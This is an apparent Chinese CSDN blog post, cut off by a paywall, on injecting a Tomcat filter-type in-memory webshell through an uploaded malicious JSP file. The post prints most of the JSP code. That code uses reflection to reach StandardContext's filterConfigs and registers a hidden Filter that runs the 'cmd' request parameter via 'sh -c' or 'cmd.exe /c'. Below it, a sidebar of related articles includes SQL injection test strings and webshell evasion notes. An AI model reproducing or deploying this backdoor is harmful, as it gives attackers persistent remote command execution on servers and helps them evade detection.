【安全记录】通过jsp文件注入内存马

最新推荐文章于 2024-07-31 16:53:12 发布
最新推荐文章于 2024-07-31 16:53:12 发布
阅读量1.9k 收藏 5
点赞数 2
分类专栏: 信安文摘 文章标签: 信息安全 网络安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FHLZLHQ/article/details/119947107
版权
本文详细介绍了如何通过上传恶意jsp文件,分别生成filter和servlet类型的内存马,实现对目标服务器的命令执行。内容涵盖注入过程、相关类的使用以及实际效果演示,是对内存马理论知识的实践应用。
摘要由CSDN通过智能技术生成

文章目录

微信公众号:信安文摘

1. 前言

前面对内存马的理论知识进行了学习:https://mp.weixin.qq.com/s/Y4Wvs3YK1J03Kh7HfPY3gg

这篇文章学习使用jsp文件注入内存马(可以将恶意的jsp文件上传到目标服务器并访问,来注入内存马)。

2. 上传jsp文件生成filter类型的内存马

首先展示恶意jsp文件:

<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.util.Map" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.util.Scanner" %>
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>

<%
    final String name = "junxinglu";
    // 获取上下文
    ServletContext servletContext = request.getSession().getServletContext();

    Field appctx = servletContext.getClass().getDeclaredField("context");
    appctx.setAccessible(true);
    ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);

    Field stdctx = applicationContext.getClass().getDeclaredField("context");
    stdctx.setAccessible(true);
    StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);

    Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
    Configs.setAccessible(true);
    Map filterConfigs = (Map) Configs.get(standardContext);

    if (filterConfigs.get(name) == null){
        Filter filter = new Filter() {
            @Override
            public void init(FilterConfig filterConfig) throws ServletException {

            }

            @Override
            public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
                HttpServletRequest req = (HttpServletRequest) servletRequest;
                if (req.getParameter("cmd") != null) {
                    boolean isLinux = true;
                    String osTyp = System.getProperty("os.name");
                    if (osTyp != null && osTyp.toLowerCase().contains("win")) {
                        isLinux = false;
                    }
                    String[] cmds = isLinux ? new String[] {"sh", "-c", req.getParameter("cmd")} : new String[] {"cmd.exe", "/c", req.getParameter("cmd")};
                    InputStream in = Runtime.get
最低0.47元/天 解锁文章
君行路V
关注
专栏目录
Java Tomcat内存——filter内存
m0_61506558的博客
11-17 640
至此,invoke()部分的所有流程我们都分析完毕了,接着继续往上看,也就是doFilter()方法。这个doFilter()方法也是由最近的那个invoke()方法调用的。如图,我们把断点下过去。如果师傅们这个invoke()方法可用的话,可以断点下这里,如果不可用的话可以下到后面doFilter()方法。这里我们要重点关注前文说过的这个变量,那它是什么呢?我们跟进这个方法。使用创建了一个过滤链,将进行传递。我们在方法走一下流程。
【Web安全JSP内存研究
HBohan的博客
10-19 624
前言 最近在研究webshell免杀的问题,到了内存免杀部分发现传统的Filter或者Servlet查杀手段比较多,不太容易实现免杀,比如有些工具会将所有注册的Servlet和Filter拿出来,排查人员仔细一点还是会被查出来的,所以 我们要找一些其他方式实现的内存。比如我今天提到的JSP内存(虽然本质上也是一种Servlet类型的) 。 【学习资料】 JSP加载流程分析 在Tomcat中jspjspx都会交给JspServlet处理,所以要想实现JSP驻留内存,首先得分析JspServlet.
jsp mysql 注入_Jsp+Mysql网站注入并拿root权限的全过程
weixin_42365492的博客
02-01 517
很多人可能都知道asp,php的编程要防止sql注入漏洞,而并不知道jsp编程同样也需要防备sql注入漏洞.其实,一旦jsp代码有注入漏洞,将直接影响到整个系统的安全。本文就是主要展示一下我的一次JSP+MYSQL注入导出webshell的过程。www.***.***.cn是国内某一个著名研究所的网站,我们在这里对其进行善意的测试。当然,在写此文之前我已经将漏洞通知了网站管理员.并对文中所有的图片...
学习了解内存,看这篇就够了!(精华版)
最新发布
隔壁王叔的博客
07-31 1167
学习了解内存,看这篇就够了!(精华版)
手工注入jsp
0ffs3t
01-20 1423
可能有人会说这个题目太假了,对,没错,是有点假,但是内容确实是本人整理的。希望可以给大家带来帮助。   检测可否注入   http://www.2cto.com /publics/detail.jsp?id=7674 and 1=1 (正常页面)   http://www.2cto.com /publics/detail.jsp?id=7674 and 1=2 (出错页面)   检
JSP注入
weixin_30256901的博客
05-02 274
老东西了,不过很有用大家看看。(大牛飘过)1、 判断注入类型(数字型还是字符型)字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符 型判断两部分) http://www.asphack.com/index_kaoyan_view.jsp?id=117 And user>char(0) http://www.asphack.com/index_kaoyan_v...
Jsp基本注入
蓝法典的专栏
03-19 2128
测试方法and 1=1 and 1=2and user_name()=dboAND ascii(lower(substring((select TOP 1 name FROM sysobjects where xtype=U), 1,1))) > 109 AND ascii(lower(substring((select TOP 1 name FROM sysobjects where x
网络安全】利用Fastjson注入Spring内存
HBohan的博客
11-10 1417
此篇文章在于记录自己对spring内存的实验研究【点击查看→资料】 一、环境搭建 搭建漏洞环境,利用fastjson反序列化,通过JNDI下载恶意的class文件,触发恶意类的构造函数中代码,注入controller内存。 1)组件版本: fastjson: 1.2.24 spring-mvc: 4.3.28.RELEASE JDK: 8u121 2)搭建springMVC+fastjson漏洞环境 可以参考网上的入门文章进行搭建,这里我放出我自己环境的配置文件 web.xml <servle.
内存介绍及分析-带查杀工具tomcat memshell scanner.jsp
weixin_65629944的博客
12-18 1054
先判断是通过什么方法注入内存,可以先查看web日志是否有可疑的web访问日志,如果是filter或者listener类型就会有大量url请求路径相同参数不同的,或者页面不存在但是返回200的,查看是否有类似哥斯拉、冰蝎相同的url请求,哥斯拉和冰蝎的内存注入流量特征与普通webshell的流量特征基本吻合。4.java VisualVM工具:是一款免费的,集成了多个 JDK 命令行工具的可视化工具,它能为您提供强大的分析能力,对 Java 应用程序做性能分析和调优。cmd=后跟命令即可。
安全记录】基于Tomcat的Java内存初探
君行路的博客
08-22 469
文章目录1. 前言2. 基础知识2.1 servlet 和 filter2.2 servlet 和 filter 的生命周期2.3 Tomcat 的 Container – 容器组件2.4 Tomcat中的启动加载顺序3. 内存技术实现介绍3.1 获取上下文对象 ServletContext3.1.1 通过当前 request 对象获取 ServletContext3.1.2 通过 `Thread.currentThread().getContextClassLoader()` 获取 StandardCo
[源码和文档分享]基于JSP实现的操作系统内存分配演示
qq_38474647的博客
04-07 140
1.1 题目要求 Linux 中内存分配的伙伴堆算法模拟。 模拟内存实时情况 实现 Buddy heap 算法 通过键盘输入随机产生的申请和释放操作 每次申请或释放都显示实时的内存分配的对比图 ​ 参考文档和完整的文档和源码下载地址: ...
jsp注入加sa提权jsp注入加sa提权
05-27
jsp注入加sa提权jsp注入加sa提权jjsp注入加sa提权sp注入加sa提权
JSP文件
08-13
jsp, 放到网站可以访问的目录, 访问页面,即可管理服务器内容.切勿用于非法用途
JSP+ORACLE注入方法
06-30
AD表为例来说明JSP+ORACLE注入 , 呵呵 大家来玩玩。
JSP手工注入
菜菜鸟_黑马的专栏
02-15 2639
 1、 判断注入类型(数字型还是字符型)字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分)And user>char(0)And userhttp://www.test.net/index_kaoyan_view.jsp?id=117 And user>char(0) And 1=1 And userchar(0) And %25= And use
Shiro注入内存
Le1a's Blog
10-21 2061
前段时间学习了在Shell中如何注入Filter型内存,搞忘了写博客了,这里重新来记录一下过程。这里直接选择用CB链来打,CB链忘记了可以看前面的文章:https://www.le1a.com/posts/a5f4a9e3/
结合反序列化注入tomcat内存
白帽子凯哥哥的博客
05-24 1134
通过前几个内存的学习我们可以知道,将内存写在jsp文件上传并不是传统意义上的内存注入jsp文件本质上就是一个servlet,servlet会编译成class文件,也会实现文件落地。借用木头师傅的一张图结合反序列化注入内存是动态注入内存的常用方法,然而通过反序列化注入的方式没有jsp文件的request内置类,所以获取回显的方式我们也需要考虑,在此写下这篇文章分析总结反序列化注入的方法细节。读者福利 |CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
CVE-2022-26134 Confluence 无文件落地的内存注入姿势
qq_40466372的博客
07-06 5672
CVE-2022-26134 Confluence 无文件落地的内存注入
用 Goby 通过反序列化漏洞一键打入内存【利用篇】_命令执行注入内存
2401_84931491的博客
05-13 634
在全部配置完成后,点击生成,就可以将生成的反序列化 payload 进行保存了。关于 Gadget、利用方式等相关信息的更多介绍,可以查看我开源项目的 ReadMe 或源代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值